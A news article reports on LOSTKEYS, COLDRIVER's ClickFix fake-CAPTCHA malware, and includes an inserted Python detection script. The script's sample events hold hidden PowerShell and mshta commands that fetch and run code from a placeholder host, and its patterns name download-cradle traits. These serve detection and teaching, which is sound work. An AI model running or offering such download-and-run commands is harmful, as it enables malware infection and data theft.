
A fake CAPTCHA prompt delivers Russian malware that crawls through private files, and it has been seen in the wild targeting high officials.
“I am not a robot.” You’ve probably seen this a thousand times. In some cases, instead of verifying that you are human, clicking it sets off an infection chain that leads straight into the hands of Russian intelligence.
Google’s Threat Intelligence Group (GTIG) has identified a new malware strain dubbed LOSTKEYS. This new malware is a digital burglary tool created by COLDRIVER, a Kremlin-backed hacking group also known as UNC4057, Star Blizzard, and Callisto. These are the same operators who’ve spent the last few years targeting NATO officials, Western diplomats, and non-governmental organizations (NGOs).
GTIG identified that the operation starts with a fake CAPTCHA prompt. The target lands on a fraudulent website, likely after being emailed a crafted link. When they “verify” they’re human, the site copies a PowerShell command to their clipboard and tells them to paste it into the Windows Run prompt, which launches the malware. This social engineering technique, called ClickFix, has been on the rise, with many threat actors using it against their victims.
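As an added illustration of the detection side (not from the original article or from GTIG), the following Python flags process-creation events that fit the ClickFix pattern described above: an interpreter spawned under explorer.exe, which is the parent of anything launched from the Run prompt, with a command line that fetches or decodes further code. The event records and hostnames are constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
# Win+R launches its child directly under explorer.exe, so a ClickFix paste
# shows up as explorer.exe -> powershell.exe with a download-and-run command.
# The typed text also lands in HKCU\...\Explorer\RunMRU, a corroborating artifact.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -c "iex (iwr https://captcha.example.invalid/verify)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},                      # user opened a shell: benign
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -c "Get-ChildItem"'},   # terminal session: benign
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://captcha.example.invalid/v.hta"},
]

# Interpreters a ClickFix lure typically tells the victim to paste into.
INTERPRETERS = re.compile(r"\\(powershell|pwsh|mshta|cmd|wscript|cscript)\.exe$", re.I)
# Command-line traits of a one-liner that fetches or decodes further code.
CRADLE = re.compile(
    r"(iex\b|invoke-expression|iwr\b|invoke-webrequest|downloadstring|"
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|https?://)", re.I)

def is_run_prompt_cradle(event):
    """True when an interpreter is spawned by explorer.exe (the Run prompt's
    parent) with a command line that downloads or decodes more code."""
    if not event["ParentImage"].lower().endswith(r"\explorer.exe"):
        return False
    if not INTERPRETERS.search(event["Image"]):
        return False
    return bool(CRADLE.search(event["CommandLine"]))

def score(event):
    """Number of distinct cradle traits on the command line; two or more is a
    strong ClickFix signal, one warrants a look."""
    return len({m.group(0).lower() for m in CRADLE.finditer(event["CommandLine"])})

def flag_events(events):
    """Return (index, score, command line) for every event matching the pattern."""
    return [(i, score(e), e["CommandLine"])
            for i, e in enumerate(events) if is_run_prompt_cradle(e)]

if __name__ == "__main__":
    for i, s, cmd in flag_events(SAMPLE_EVENTS):
        print(f"event {i}: score {s}: {cmd}")
```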
Once inside, LOSTKEYS combs through the system, looking in specific directories for files with specific extensions so it can quickly steal credentials, exfiltrate emails, and harvest contact lists from compromised accounts. Everything it finds is sent straight back to the attackers.
While credential theft remains COLDRIVER’s primary tactic, in certain cases the group escalates to deploying malware directly on the target’s device, a step reserved for situations where access to local files is critical.
GTIG says the malware was spotted in campaigns running as recently as April 2025, but earlier samples trace back to December 2023, disguised as legitimate files tied to Maltego, a well-known OSINT tool. Whether these were early experiments or the work of another actor entirely is still unknown.
Who’s being targeted?
COLDRIVER’s operations are highly targeted, focusing on individuals with access to sensitive information. According to GTIG, the group typically goes after high-profile individuals via their personal email accounts or those associated with NGOs.
The group’s recent activity has focused on current and former advisors to Western governments and militaries, as well as journalists, think tanks, and NGO personnel.
Individuals connected to Ukraine have remained a consistent target, reflecting COLDRIVER’s alignment with Russia’s strategic intelligence objectives.
In a small but notable number of cases, COLDRIVER has also been linked to hack-and-leak operations, including campaigns targeting officials in the United Kingdom and at least one NGO, raising concerns about how stolen data may be weaponized to influence public discourse or policy.
After the discovery, Google’s response has been swift: malicious domains have been removed, compromised files have been flagged by Safe Browsing, and targeted Gmail and Workspace users have been warned.